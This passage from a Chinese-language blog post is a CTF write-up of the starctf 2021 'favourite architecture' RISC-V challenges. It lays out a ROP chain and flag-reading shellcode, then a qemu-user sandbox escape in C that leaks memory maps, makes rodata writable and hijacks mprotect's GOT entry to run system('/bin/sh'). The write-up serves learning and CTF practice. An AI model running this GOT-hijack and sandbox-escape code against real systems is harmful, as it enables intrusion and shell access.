<p>因为代码是一样的，只是在架构层面不同，大体思路跟x86下利用是差不多的，不过还是有些差别。</p>
<ol>
<li>第一条ROP：0x1179e。控制s0为gets + 0x478，控制s2为gets + 0x470，控制ra为0x11772。</li>
<li>执行完ret后跳到第二条ROP：0x11772。通过第一步的构造我们能够满足0x11782的beq条件成立，直接跳转到0x1179e。</li>
<li>第三条ROP：0x1179e。控制s3为bss地址，s1为0，s2为1，ra为0x1178e。</li>
<li>执行完ret后调到第四条ROP：0x1178e。a0为bss地址，s1=0+1=1=s2，满足0x11796的跳转条件，执行<code>gets(bss_addr)</code>。</li>
</ol>
<p>同时shellcode也同样可行，主要的思路是运用三个RISC-V下的系统调用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">$ riscv64-unknown-linux-gnu-as shellcode.s -o shellcode</span><br><span class="line">$ riscv64-unknown-linux-gnu-objcopy -S -o binary -j .text shellcode shellcode.bin</span><br><span class="line"></span><br><span class="line">.section .text</span><br><span class="line">.globl _start</span><br><span class="line">.option rvc</span><br><span class="line">_start:</span><br><span class="line"></span><br><span class="line">  li a1,0x67616c66 #flag</span><br><span class="line">  sd a1,8(sp)</span><br><span class="line">  addi a1,sp,8</span><br><span class="line">  li a0,-100</span><br><span class="line">  li a2,0</span><br><span class="line">  li a7, 56 # 56: openat</span><br><span class="line">  ecall</span><br><span class="line">	</span><br><span class="line">  c.mv a2,a7</span><br><span class="line">  addi a7,a7,7 # 63: read</span><br><span class="line">  ecall</span><br><span class="line">  li a0, 1</span><br><span class="line">  addi a7,a7,1 # 64: write</span><br><span class="line">  ecall</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>这三个系统调用都在白名单里面，写好shellcode直接注入即可。</p>
<h3 id="favourite-architecture-2"><a href="#favourite-architecture-2" class="headerlink" title="favourite architecture 2"></a>favourite architecture 2</h3><p>第一次接触这种qemu沙箱逃逸的题目，看了好多师傅的博客，终于差不多看懂了，做一下记录。</p>
<p>之所以可以从qemu中逃逸出来，是因为qemu-user的内存布局跟主系统的内存布局有很紧密的联系。</p>
<p>经过测试，从qemu-user的沙箱里面，基本可以向qemu执行的程序之外的一定内存空间做任意地址读、任意地址写。</p>
<p>同样是利用上一题栈溢出的漏洞为基础继续做，只不过这次不读取<code>flag</code>，读取<code>/proc/self/maps</code>，查看内存情况。</p>
<p>本来想在gdb里面调试看内存的，结果看不见前面的内存。</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/vmmap1.png">
<p>msk师傅告诉我这是虚拟地址，确实是这样。</p>
<p>可以通过访问<code>/proc/self/maps</code>看到当前内存布局，结果发现看了个寂寞：</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/cat_maps_failed.png">
<p>有师傅去看了qemu的源码分析，发现原来是qemu塞了个假的内存分布信息给你。（你被骗了</p>
<p>师傅们有很多的解法，其中一种是改成<code>/./proc/self/maps</code>，就能得到正确的内存分布情况。</p>
<img data-src="http://qiniu.garen-wang.cn/static/images/First-Presentation-in-Kap0k/cat_maps_successfully.png">
<p>剩下的内容就是pwn的常规操作：</p>
<ol>
<li>通过实际内存分布信息，找到qemu的基地址和libc的基地址。</li>
<li>查偏移，查出<code>mprotect@got</code>，<code>system</code>和rodata的偏移，利用前面的两个基地址推出实际地址。</li>
<li>首先利用<code>mprotect</code>把rodata的一段内容改为可写，并在这段首写入<code>/bin/sh\x00</code>。</li>
<li>劫持<code>mprotect</code>的got表为<code>system</code>函数。</li>
<li>最后执行shellcode，调用<code>mprotect@got</code>，参数为rodata段首，执行<code>system(&quot;/bin/sh\x00&quot;)</code>。</li>
</ol>
<p>只不过这道题要劫持控制流，比较方便的方法还是使用ret2shellcode。</p>
<p>可以利用C生成出shellcode，下面是示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><span class="line">int openat(int dirfd, char* pathname, int flags);</span><br><span class="line">int read(int fd, void *buf,int size);</span><br><span class="line">int write(int fd, void *buf, int size);</span><br><span class="line">int mprotect(void* addr, unsigned long len, int prot);</span><br><span class="line">void exit(int no);</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line"></span><br><span class="line">	char filename[32];</span><br><span class="line">	filename[0] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	filename[1] &#x3D; &#39;.&#39;;</span><br><span class="line">	filename[2] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	filename[3] &#x3D; &#39;p&#39;;</span><br><span class="line">	filename[4] &#x3D; &#39;r&#39;;</span><br><span class="line">	filename[5] &#x3D; &#39;o&#39;;</span><br><span class="line">	filename[6] &#x3D; &#39;c&#39;;</span><br><span class="line">	filename[7] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	filename[8] &#x3D; &#39;s&#39;;</span><br><span class="line">	filename[9] &#x3D; &#39;e&#39;;</span><br><span class="line">	filename[10] &#x3D; &#39;l&#39;;</span><br><span class="line">	filename[11] &#x3D; &#39;f&#39;;</span><br><span class="line">	filename[12] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	filename[13] &#x3D; &#39;m&#39;;</span><br><span class="line">	filename[14] &#x3D; &#39;a&#39;;</span><br><span class="line">	filename[15] &#x3D; &#39;p&#39;;</span><br><span class="line">	filename[16] &#x3D; &#39;s&#39;;</span><br><span class="line">	filename[17] &#x3D; &#39;\0&#39;;</span><br><span class="line"></span><br><span class="line">	unsigned char *buf &#x3D; (unsigned char*)0x6d000;</span><br><span class="line">	int fd &#x3D; openat(0, filename, 0);</span><br><span class="line">	read(fd, buf, 0xF80);</span><br><span class="line">	write(1, buf, 0xF80);</span><br><span class="line">	read(fd, buf, 0xF80);</span><br><span class="line">	write(1, buf, 0xF80);</span><br><span class="line">	read(fd, buf, 0xF80);</span><br><span class="line">	write(1, buf, 0xF80);</span><br><span class="line"></span><br><span class="line">	unsigned long rodata;</span><br><span class="line">	unsigned long mprotect_got;</span><br><span class="line">	unsigned long system_addr;</span><br><span class="line"></span><br><span class="line">	read(0, &amp;rodata, 8);</span><br><span class="line">	read(0, &amp;mprotect_got, 8);</span><br><span class="line">	read(0, &amp;system_addr, 8);</span><br><span class="line">	mprotect((void *)rodata, 0x3c000, 7);</span><br><span class="line"></span><br><span class="line">	*(unsigned long *)mprotect_got &#x3D; system_addr;</span><br><span class="line"></span><br><span class="line">	buf[0] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	buf[1] &#x3D; &#39;b&#39;;</span><br><span class="line">	buf[2] &#x3D; &#39;i&#39;;</span><br><span class="line">	buf[3] &#x3D; &#39;n&#39;;</span><br><span class="line">	buf[4] &#x3D; &#39;&#x2F;&#39;;</span><br><span class="line">	buf[5] &#x3D; &#39;s&#39;;</span><br><span class="line">	buf[6] &#x3D; &#39;h&#39;;</span><br><span class="line">	buf[7] &#x3D; &#39;\0&#39;;</span><br><span class="line"></span><br><span class="line">	mprotect(buf, 0x1000, 7);	&#x2F;&#x2F; this will call system(&quot;&#x2F;bin&#x2F;sh&quot;)</span><br><span class="line">	exit(0);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asm(&quot;openat:\n&quot;</span><br><span class="line">		&quot;li a7, 56\n&quot;</span><br><span class="line">		&quot;ecall\n&quot;</span><br><span class="line">		&quot;ret\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asm(&quot;read:\n&quot;</span><br><span class="line">		&quot;li a7, 63\n&quot;</span><br><span class="line">		&quot;ecall\n&quot;</span><br><span class="line">		&quot;ret\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asm(&quot;write:\n&quot;</span><br><span class="line">		&quot;li a7, 64\n&quot;</span><br><span class="line">		&quot;ecall\n&quot;</span><br><span class="line">		&quot;ret\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asm(&quot;mprotect:\n&quot;</span><br><span class="line">		&quot;li a7, 226\n&quot;</span><br><span class="line">		&quot;ecall\n&quot;</span><br><span class="line">		&quot;ret\n&quot;);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">asm(&quot;exit:\n&quot;</span><br><span class="line">		&quot;li a7, 93\n&quot;</span><br><span class="line">		&quot;ecall\n&quot;</span><br><span class="line">		&quot;ret\n&quot;);</span><br></pre></td></tr></table></figure>
<h2 id="reference"><a href="#reference" class="headerlink" title="reference"></a>reference</h2><ol>
<li><a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/RISC-V">https://en.wikipedia.org/wiki/RISC-V</a></li>
<li><a target="_blank" rel="noopener" href="https://inst.eecs.berkeley.edu/~cs61c/resources/su18_lec/Lecture7.pdf">https://inst.eecs.berkeley.edu/~cs61c/resources/su18_lec/Lecture7.pdf</a></li>
<li><a target="_blank" rel="noopener" href="https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/14/getshell2/">https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/14/getshell2/</a></li>
<li><a target="_blank" rel="noopener" href="https://github.com/BrieflyX/ctf-pwns/tree/master/escape/favourite_architecture">https://github.com/BrieflyX/ctf-pwns/tree/master/escape/favourite_architecture</a></li>
<li><a target="_blank" rel="noopener" href="https://pullp.github.io/2021/01/23/starctf-2021-writeup/">https://pullp.github.io/2021/01/23/starctf-2021-writeup/</a></li>
</ol>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/23/CodeQL-Learning-Notes/" rel="prev" title="CodeQL Learning Notes">
      <i class="fa fa-chevron-left"></i> CodeQL Learning Notes
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/05/Syntax-Highlighting-in-Parsing-Expression-Grammar/" rel="next" title="Syntax Highlighting in Parsing Expression Grammar">
      Syntax Highlighting in Parsing Expression Grammar <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#RISC-V%E7%9A%84%E5%88%86%E4%BA%AB"><span class="nav-number">1.</span> <span class="nav-text">RISC-V的分享</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#RISC-V%E4%BA%86%E8%A7%A3"><span class="nav-number">1.1.</span> <span class="nav-text">RISC-V了解</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#RISC-V%E7%9A%84%E5%AF%84%E5%AD%98%E5%99%A8"><span class="nav-number">1.1.1.</span> <span class="nav-text">RISC-V的寄存器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#RISC-V%E6%B1%87%E7%BC%96%E8%AF%AD%E5%8F%A5"><span class="nav-number">1.1.2.</span> <span class="nav-text">RISC-V汇编语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#RISC-V%E5%AE%9E%E4%BE%8B"><span class="nav-number">1.1.3.</span> <span class="nav-text">RISC-V实例</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RISC-V%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-number">1.2.</span> <span class="nav-text">RISC-V环境配置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98%EF%BC%9Astarctf-2021-pwn-amp-re-favorite-architecture"><span class="nav-number">1.3.</span> <span class="nav-text">例题：starctf 2021 pwn&amp;re favorite architecture</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#favorite-architecture-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">favorite architecture 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#favourite-architecture-2"><span class="nav-number">1.3.2.</span> <span class="nav-text">favourite architecture 2</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#reference"><span class="nav-number">1.4.</span> <span class="nav-text">reference</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Garen Wang"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Garen Wang</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">28</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Garen-Wang" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Garen-Wang" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:garen-wang@qq.com" title="E-Mail → mailto:garen-wang@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>



      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">粤ICP备2021003110号 </a>
      <img src="/images/beian.png" style="display: inline-block;">
  </div>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Garen Wang</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  
      

<script>
  if (typeof MathJax === 'undefined') {
    window.MathJax = {
      loader: {
          load: ['[tex]/mhchem'],
        source: {
          '[tex]/amsCd': '[tex]/amscd',
          '[tex]/AMScd': '[tex]/amscd'
        }
      },
      tex: {
        inlineMath: {'[+]': [['$', '$']]},
          packages: {'[+]': ['mhchem']},
        tags: 'ams'
      },
      options: {
        renderActions: {
          findScript: [10, doc => {
            document.querySelectorAll('script[type^="math/tex"]').forEach(node => {
              const display = !!node.type.match(/; *mode=display/);
              const math = new doc.options.MathItem(node.textContent, doc.inputJax[0], display);
              const text = document.createTextNode('');
              node.parentNode.replaceChild(text, node);
              math.start = {node: text, delim: '', n: 0};
              math.end = {node: text, delim: '', n: 0};
              doc.math.push(math);
            });
          }, '', false],
          insertedScript: [200, () => {
            document.querySelectorAll('mjx-container').forEach(node => {
              let target = node.parentNode;
              if (target.nodeName.toLowerCase() === 'li') {
                target.parentNode.classList.add('has-jax');
              }
            });
          }, '', false]
        }
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = '//cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'wMExYSieDga8BTVjfcUnCRh1-gzGzoHsz',
      appKey     : 'pYUGXalVN490u6EsT2HJA4Rj',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>


  <!-- script src="https://cdn.jsdelivr.net/gh/Garen-Wang/live2d-moc3@vv0.2.2/js/live2dcubismcore.js"></script -->
  <!-- script src="https://cdn.jsdelivr.net/gh/Garen-Wang/live2d-moc3@vv0.2.2/js/bundle.js"></script -->

  <canvas id="live2d-canvas" width="400" height="400" style="position: fixed; opacity: 1; left: -110px; bottom: -135px; z-index: 99999; background-color: white;"></canvas>
  <script src="https://cdn.jsdelivr.net/gh/Garen-Wang/live2d-moc3@vv0.1.1/js/live2dcubismcore.js"></script>
  <script src="https://cdn.jsdelivr.net/gh/Garen-Wang/live2d-moc3@vv0.1.1/js/bundle.js"></script>
  <script>
    var resourcesPath = 'https://cdn.jsdelivr.net/gh/Garen-Wang/live2d-moc3@v0.1.0/';
    var backImageName = '';
    var modelDir = ['jiaran4'];
    initDefine(resourcesPath, backImageName, modelDir);
  </script>

</body>
</html>
